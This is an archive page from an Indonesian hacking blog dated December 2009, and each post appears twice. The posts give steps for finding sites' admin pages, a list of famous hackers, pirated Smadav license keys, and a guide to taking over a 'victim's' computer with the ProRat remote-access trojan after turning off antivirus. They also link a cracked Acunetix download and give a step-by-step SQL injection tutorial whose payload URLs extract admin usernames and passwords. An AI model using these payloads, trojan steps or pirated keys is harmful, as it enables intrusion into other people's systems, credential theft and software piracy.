Saturday, 19 December 2009
Pelajari bagaimana menemukan halaman admin seperti 90 persen dari situs
Pelajari bagaimana menemukan halaman admin web 90% sukses
Pertama
download
http://uploading.com/files/294792d5/...86-291086.msi/
download the admin finder:
http://uploading.com/files/b169bm53/...Blanguage.rar/
Ok now the real work start:
Install the perl tool on your PC. It take few minutes because there lots of files to copy so do not stop it for any reason.
Then extract the admin finder page and copy it to your hard drive
partition C:/
sekarang buka -> start -> run -> type cmd -> press enter
Type cd\ and press enter
then type admin.pl and press enter
then write target website and press enter
then choose the type of that website. This tool will work on asp , php , cfm and press enter
The tool will search for the admin page as it is shown in this picture.
Pelajari bagaimana menemukan halaman admin web 90% sukses
Pertama
download
http://uploading.com/files/294792d5/...86-291086.msi/
download the admin finder:
http://uploading.com/files/b169bm53/...Blanguage.rar/
Ok now the real work start:
Install the perl tool on your PC. It take few minutes because there lots of files to copy so do not stop it for any reason.
Then extract the admin finder page and copy it to your hard drive
partition C:/
sekarang buka -> start -> run -> type cmd -> press enter
Type cd\ and press enter
then type admin.pl and press enter
then write target website and press enter
then choose the type of that website. This tool will work on asp , php , cfm and press enter
The tool will search for the admin page as it is shown in this picture.
10 Hacker Ternama Dunia
LONDON – Keahlian seorang hacker seringkali dianggap ‘merepotkan’ sejumlah korbannya. Padahal belum tentu semua hacker bisa dicap negatif, banyak diantara mereka yang menggunakan keahliannya untuk tujuan-tujuan melihat atau memperbaiki kelemahan perangkat lunak di komputer.
Tapi akibat, ulah sejumlah hacker yang menggunakan keahliannya untuk tujuan jahat seringkali hacker mendapat pandangan negatif dari masyarakat.
Perjalanan untuk menjadi seorang hacker sendiri dilalui melalui perjalanan yang panjang. Untuk menjadi seorang hacker terkenal, tak jarang harus berhadapan dengan penjara. Tengok saja perjalanan 10 hacker ternama dunia berikut seperti dilansir Telegraph, Minggu (29/11/2009).
1. Kevin Mitnick
Pria kelahiran 6 Agustus 1963 ini adalah salah satu hacker komputer yang paling kontroversial di akhir abad ke-20. Pengadilan Amerika Serikat bahkan menjulukinya sebagai buronan kriminal komputer yang paling dicari di Amerika. Kevin diketahui pernah membobol jaringan komputer milik perusahaan telekomunikasi besar seperti Nokia, Fujitsu and Motorola.
Kevin Mitnick ditangkap FBI pada Januari 1995 di apartemennya di kota Raleigh, North Carolina atas tuduhan penyerangan terhadap pemerintahan. Saat ini, ia berprofesi sebagai seorang konsultan keamanan sistem jaringan komputer.
2. Kevin Poulson
Jauh sebelum menjadi senior editor di Wired News, Pria bernama lengkap Kevin Lee Poulsen ini dikenal sebagai seorang hacker jempolan. Pria kelahiran Pasadena Amerika Serikat, 1965 ini pernah membobol jaringan telepon tetap milik stasiun radio Los Angeles KIIS-FM, sehingga ia seringkali memenangkan kuis-kuis radio. Bahkan lewat kuis telepon via radio ia bisa memenangkan sebuah hadiah utama, mobil Porsche.
3. Adrian Lamo
Nama Adrian Lamo sering dijuluki sebagai ‘the homeless hacker’ pasalnya ia sering melakukan aksi-aksinya di kedai-kedai kopi, perpustakaan atau intenetcafe. Aksinya yang paling mendapatkan perhatian adalah ketika ia membobol jaringan milik perusahaan Media, New York Times dan Microsoft, MCI WorldCom, Ameritech, Cingular. Tak hanya itu, ia juga berhasil menyusupi sistem milik AOL Time Warner, Bank of America, Citigroup, McDonald’s and Sun Microsystems. Kini pria tersebut berprofesi sebagai seorang jurnalis.
4. Stephen Wozniak
‘Woz’ begitu ia biasa disapa. Saat ini mungkin lebih dikenal sebagai seorang pendiri Apple. Tapi saat menjadi mahasiswa, Wozniak pernah menjadi seorang hacker yang cukup mumpuni. Pria berusia 59 tahun itu diketahui pernah membobol jaringan telepon yang memungkinkannya menelepon jarak jauh tanpa membayar sedikit pun dan tanpa batas waktu. Alat yang dibuat semasa menjadi mahasiswa itu dikenal dengan nama ‘blue boxes’
5. Loyd Blankenship
Pria berjuluk The Mentor ini pernah menjadi anggota grup hacker kenamaan tahun 1980 Legion Of Doom. Blakenship adalah penulis buku The Conscience of a Hacker (Hacker Manifesto). Buku yang ditulis setelah ia ditangkap dan diumumkan dalam ezine hacker bawah tanah Phrack.
6. Michael Calce
Sejak usia muda Calce memang dikenal sebagai seorang Hacker. Aksinya membobol situs-situs komersial dunia dilakukannya ketika ia berusia 15 tahun. Pria yang menggunakan nama MafiaBoy dalam setiap aksinya itu, ditangkap ketika membobol pada tahun 2000 mengacak-acak eBay, Amazon and Yahoo.
7. Robert Tappan Morris
Nama Morris dikenal sebagai seorang pembuat virus internet pada tahun 1988, atau dikenal sebagai ‘Morris Worm’ yang diketahui merusak sekira 6.000 komputer. Akibat ulahnya ia dikenai sanksi untuk bekerja sosial selama 4000 jam. Kini ia bekerja sebagai pendidik di Massachusetts Institute of Technology.
8. The Masters Of Deception
The Masters Of Deception (MoD) merupakan kelompok hacker yang berbasis di New York. Kelompok ini sering mengganggu jaringan telepon milik perusahaan telekomunikasi seperti AT&T. Sejumlah anggota kelompok ini ditangkap pada tahun 1992 dan dijebloskan ke penjara.
9. David L. Smith
Smith dikenal sebagai penemu Mellisa worm, yang pertama kali ditemukan pada 26 Maret 1999. Mellisa sering juga dikenal sebagai “Mailissa”, “Simpsons”, “Kwyjibo”, atau “Kwejeebo”. Virus ini didistribusikan lewat email. Smith sendiri akhirnya diseret ke penjara karena virusnya telah menyebabkan kerugian sekira USD80 juta
10. Sven Jaschan
Jaschan menorehkan namanya sebagai seorang penjahat dunia maya pada tahun 2004 saat membuat program jahat Netsky dan Sasser worm. Saat ini ia bekerja di sebuah perusahaan keamanan jaringan.
copyleft from:http://bobyhikaru.biz/
Tapi akibat, ulah sejumlah hacker yang menggunakan keahliannya untuk tujuan jahat seringkali hacker mendapat pandangan negatif dari masyarakat.
Perjalanan untuk menjadi seorang hacker sendiri dilalui melalui perjalanan yang panjang. Untuk menjadi seorang hacker terkenal, tak jarang harus berhadapan dengan penjara. Tengok saja perjalanan 10 hacker ternama dunia berikut seperti dilansir Telegraph, Minggu (29/11/2009).
1. Kevin Mitnick
Pria kelahiran 6 Agustus 1963 ini adalah salah satu hacker komputer yang paling kontroversial di akhir abad ke-20. Pengadilan Amerika Serikat bahkan menjulukinya sebagai buronan kriminal komputer yang paling dicari di Amerika. Kevin diketahui pernah membobol jaringan komputer milik perusahaan telekomunikasi besar seperti Nokia, Fujitsu and Motorola.
Kevin Mitnick ditangkap FBI pada Januari 1995 di apartemennya di kota Raleigh, North Carolina atas tuduhan penyerangan terhadap pemerintahan. Saat ini, ia berprofesi sebagai seorang konsultan keamanan sistem jaringan komputer.
2. Kevin Poulson
Jauh sebelum menjadi senior editor di Wired News, Pria bernama lengkap Kevin Lee Poulsen ini dikenal sebagai seorang hacker jempolan. Pria kelahiran Pasadena Amerika Serikat, 1965 ini pernah membobol jaringan telepon tetap milik stasiun radio Los Angeles KIIS-FM, sehingga ia seringkali memenangkan kuis-kuis radio. Bahkan lewat kuis telepon via radio ia bisa memenangkan sebuah hadiah utama, mobil Porsche.
3. Adrian Lamo
Nama Adrian Lamo sering dijuluki sebagai ‘the homeless hacker’ pasalnya ia sering melakukan aksi-aksinya di kedai-kedai kopi, perpustakaan atau intenetcafe. Aksinya yang paling mendapatkan perhatian adalah ketika ia membobol jaringan milik perusahaan Media, New York Times dan Microsoft, MCI WorldCom, Ameritech, Cingular. Tak hanya itu, ia juga berhasil menyusupi sistem milik AOL Time Warner, Bank of America, Citigroup, McDonald’s and Sun Microsystems. Kini pria tersebut berprofesi sebagai seorang jurnalis.
4. Stephen Wozniak
‘Woz’ begitu ia biasa disapa. Saat ini mungkin lebih dikenal sebagai seorang pendiri Apple. Tapi saat menjadi mahasiswa, Wozniak pernah menjadi seorang hacker yang cukup mumpuni. Pria berusia 59 tahun itu diketahui pernah membobol jaringan telepon yang memungkinkannya menelepon jarak jauh tanpa membayar sedikit pun dan tanpa batas waktu. Alat yang dibuat semasa menjadi mahasiswa itu dikenal dengan nama ‘blue boxes’
5. Loyd Blankenship
Pria berjuluk The Mentor ini pernah menjadi anggota grup hacker kenamaan tahun 1980 Legion Of Doom. Blakenship adalah penulis buku The Conscience of a Hacker (Hacker Manifesto). Buku yang ditulis setelah ia ditangkap dan diumumkan dalam ezine hacker bawah tanah Phrack.
6. Michael Calce
Sejak usia muda Calce memang dikenal sebagai seorang Hacker. Aksinya membobol situs-situs komersial dunia dilakukannya ketika ia berusia 15 tahun. Pria yang menggunakan nama MafiaBoy dalam setiap aksinya itu, ditangkap ketika membobol pada tahun 2000 mengacak-acak eBay, Amazon and Yahoo.
7. Robert Tappan Morris
Nama Morris dikenal sebagai seorang pembuat virus internet pada tahun 1988, atau dikenal sebagai ‘Morris Worm’ yang diketahui merusak sekira 6.000 komputer. Akibat ulahnya ia dikenai sanksi untuk bekerja sosial selama 4000 jam. Kini ia bekerja sebagai pendidik di Massachusetts Institute of Technology.
8. The Masters Of Deception
The Masters Of Deception (MoD) merupakan kelompok hacker yang berbasis di New York. Kelompok ini sering mengganggu jaringan telepon milik perusahaan telekomunikasi seperti AT&T. Sejumlah anggota kelompok ini ditangkap pada tahun 1992 dan dijebloskan ke penjara.
9. David L. Smith
Smith dikenal sebagai penemu Mellisa worm, yang pertama kali ditemukan pada 26 Maret 1999. Mellisa sering juga dikenal sebagai “Mailissa”, “Simpsons”, “Kwyjibo”, atau “Kwejeebo”. Virus ini didistribusikan lewat email. Smith sendiri akhirnya diseret ke penjara karena virusnya telah menyebabkan kerugian sekira USD80 juta
10. Sven Jaschan
Jaschan menorehkan namanya sebagai seorang penjahat dunia maya pada tahun 2004 saat membuat program jahat Netsky dan Sasser worm. Saat ini ia bekerja di sebuah perusahaan keamanan jaringan.
copyleft from:http://bobyhikaru.biz/
key smardav pro .7.4
========================
Nama : iloovufull
Key : 098810807000
========================
atau
======================
Name : www.bi2t.com
key : 088820407060
========================
Thx to Official Site : http://www.smadav.net/
========================
Nama : iloovufull
Key : 098810807000
========================
atau
======================
Name : www.bi2t.com
key : 088820407060
========================
Thx to Official Site : http://www.smadav.net/
========================
Meremote komputer orang dengan Software ProRat
Meremote komputer orang dengan Software ProRat
Meremote komputer, inilah yang sangat digemari oleh orang awam seperti saya ini.
Meremote komputer disini maksudnya adalah mengendalikan komputer jarak jauh dengan komputer yang berbeda. Jadi kita bisa melakukan aktivitas untuk menggunakan mouse dan keyboard dengan lokasi komputer yang berbeda. Misalnya Anda ingin mengendalikan komputer kantor dari komputer/laptop di rumah hanya dengan koneksi internet.
yang dibutuhkan, hanyalah :
1. tool Advanced Ports Scanner
tool ini hanya dibutuhkan untuk mengetahui alamat IP dan Port sang korban.
bisa didownload di sini.
2. tool Prorat
aplikasi inilah yang bisa digunakan untuk meremote komputer orang lain.
kunjungi disitus resminya http://www.prorat.net
untuk tool ini bisa anda download langsung klik disini
password rar : "pro"
Sebelumnya dimatikan dulu Anti Virus kamu (disable) untuk menggunakan tool ProRat ini,
karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi
komputer kita.
untuk cara menggunakannya.
mungkin saya tidak menerangkannya disini, karena kenapa?
karena seharusnya anda download dahulu e-book cara menggunakan aplikasi / tool ProRat ini yang saya dapatkan dari ilmukomputer.org dari pembuat aslinya yang menerapkan trik ini.
e-book ini bisa anda download klik disini atau anda bisa download melalui situs http://ilmukomputer.org/2009/06/13/hacking-with-prorat/
oke. selamat mencoba . . .
Meremote komputer, inilah yang sangat digemari oleh orang awam seperti saya ini.
Meremote komputer disini maksudnya adalah mengendalikan komputer jarak jauh dengan komputer yang berbeda. Jadi kita bisa melakukan aktivitas untuk menggunakan mouse dan keyboard dengan lokasi komputer yang berbeda. Misalnya Anda ingin mengendalikan komputer kantor dari komputer/laptop di rumah hanya dengan koneksi internet.
yang dibutuhkan, hanyalah :
1. tool Advanced Ports Scanner
tool ini hanya dibutuhkan untuk mengetahui alamat IP dan Port sang korban.
bisa didownload di sini.
2. tool Prorat
aplikasi inilah yang bisa digunakan untuk meremote komputer orang lain.
kunjungi disitus resminya http://www.prorat.net
untuk tool ini bisa anda download langsung klik disini
password rar : "pro"
Sebelumnya dimatikan dulu Anti Virus kamu (disable) untuk menggunakan tool ProRat ini,
karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi
komputer kita.
untuk cara menggunakannya.
mungkin saya tidak menerangkannya disini, karena kenapa?
karena seharusnya anda download dahulu e-book cara menggunakan aplikasi / tool ProRat ini yang saya dapatkan dari ilmukomputer.org dari pembuat aslinya yang menerapkan trik ini.
e-book ini bisa anda download klik disini atau anda bisa download melalui situs http://ilmukomputer.org/2009/06/13/hacking-with-prorat/
oke. selamat mencoba . . .
Saturday, 5 December 2009
Acunetix.Web.Vulnerability.Scanner(hacking tool)
Acunetix.Web.Vulnerability.Scanner
dengan tool ini kita dapat mengetahui halaman page loading admin
Crack download versi terbaru dari Acunetix.Web.Vulnerability.Scanner.Consultant.Edition.v6.1.20090504 resmi:
http://www.acunetix.com/download/fullverv6/
Acunetix website resmi untuk mendownload Password:
User Name: acunetixfullv6
Password: Xi4ktTEXvgy6 & ll8
Lain Downloads:
http://www.ulises2k.com.ar/files/2009_05_04_01_webvulnscan6.exe
MD5: c2e32f6cf8d211d3e917cd62828c254c
Crack & Patch:
Acunetix.Web.Vulnerability.Scanner.Consultant.Edition.v6.1.20090504-Ulises2k.zip
Transfer dari: http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-v6120090504-CrackedAcunetix-Web-Vulnerability-Scanner-v6120090504-patch.html
dengan tool ini kita dapat mengetahui halaman page loading admin
Crack download versi terbaru dari Acunetix.Web.Vulnerability.Scanner.Consultant.Edition.v6.1.20090504 resmi:
http://www.acunetix.com/download/fullverv6/
Acunetix website resmi untuk mendownload Password:
User Name: acunetixfullv6
Password: Xi4ktTEXvgy6 & ll8
Lain Downloads:
http://www.ulises2k.com.ar/files/2009_05_04_01_webvulnscan6.exe
MD5: c2e32f6cf8d211d3e917cd62828c254c
Crack & Patch:
Acunetix.Web.Vulnerability.Scanner.Consultant.Edition.v6.1.20090504-Ulises2k.zip
Transfer dari: http://www.pcsec.org/archives/Acunetix-Web-Vulnerability-Scanner-v6120090504-CrackedAcunetix-Web-Vulnerability-Scanner-v6120090504-patch.html
SQL INJECTION
/ __|/ _ \| | |_ _| \| |_ | | __/ __|_ _|_ _/ _ \| \| |
\__ \ (_) | |__ | || .` | || | _| (__ | | | | (_) | .` |
|___/\__\_\____| |___|_|\_|\__/|___\___| |_| |___\___/|_|\_| step by step (dummie)
=============================================================================================================================
=============================================================================================================================
pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
=============================================================================================================================
=============================================================================================================================
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ',-
comments: /*,--
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
allinurl:news.php?newsid=
============
=step Satu:=
============
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
===========
=step Dua:=
===========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
============
=step Tiga:=
============
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
=============
=step Empat:=
=============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7
,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
============
=step Lima:=
============
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4
,group_concat(table_name),6,7,8+from+
information_schema.tables+where+table_schema=database()--
==============
= step Enam: =
==============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,
7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,
8+from+information_schema.columns+where+table_name=0x61646D696E--
=============
=step Tujuh:=
=============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,
4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
===============
=step Delapan:=
===============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan anda...
\__ \ (_) | |__ | || .` | || | _| (__ | | | | (_) | .` |
|___/\__\_\____| |___|_|\_|\__/|___\___| |_| |___\___/|_|\_| step by step (dummie)
=============================================================================================================================
=============================================================================================================================
pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
=============================================================================================================================
=============================================================================================================================
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ',-
comments: /*,--
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
allinurl:news.php?newsid=
============
=step Satu:=
============
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100
===========
=step Dua:=
===========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
============
=step Tiga:=
============
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
=============
=step Empat:=
=============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7
,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
============
=step Lima:=
============
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4
,group_concat(table_name),6,7,8+from+
information_schema.tables+where+table_schema=database()--
==============
= step Enam: =
==============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,
7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,
8+from+information_schema.columns+where+table_name=0x61646D696E--
=============
=step Tujuh:=
=============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,
4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
===============
=step Delapan:=
===============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan anda...
Subscribe to:
Posts (Atom)